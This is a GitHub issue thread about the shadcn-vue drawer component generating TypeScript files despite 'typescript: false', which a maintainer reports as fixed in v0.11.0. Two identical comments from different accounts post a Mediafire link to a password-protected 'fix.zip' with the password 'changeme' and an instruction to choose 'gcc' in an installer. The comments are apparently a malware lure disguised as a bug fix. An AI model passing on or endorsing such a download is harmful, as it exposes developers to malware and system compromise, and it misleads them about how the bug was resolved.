### ISSUE TITLE
[Bug]: `drawer` component does not respect `typescript: false` in `components.json`

### ISSUE THREAD

**Issue by gigabites19** [radix-vue/shadcn-vue#732]
### Reproduction

https://stackblitz.com/edit/vitejs-vite-zrsheh

### Describe the bug

When you run `npx shadcn-vue@latest add drawer` and you have `typescript: false` in your `components.json`, following drawer-related components still use typescript:
- `DrawerDescription.vue`
- `DrawerFooter.vue`
- `DrawerHeader.vue`
- `DrawerOverlay.vue`
- `DrawerTitle.vue`

In the reproduction run `npx shadcn-vue@latest add drawer` and inspect components above, they will be using `ts`

### System Info

```bash
System:
    OS: Linux 6.1 Manjaro Linux
    CPU: (8) x64 AMD Ryzen 5 1400 Quad-Core Processor
    Memory: 9.40 GB / 15.53 GB
    Container: Yes
    Shell: 5.2.32 - /bin/bash
  Binaries:
    Node: 20.17.0 - ~/.nvm/versions/node/v20.17.0/bin/node
    npm: 10.8.2 - ~/.nvm/versions/node/v20.17.0/bin/npm
```

### Contributes

- [X] I am willing to submit a PR to fix this issue
- [ ] I am willing to submit a PR with failing tests

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gigabites19** [comment]
I also want to say, thank you @zernonia  @sadeghbarati  and others for this project, I find it super useful and of course, beautiful.

**Comment by zernonia** [comment]
Fixed in [v0.11.0](https://github.com/unovue/shadcn-vue/releases/tag/v0.11.0)
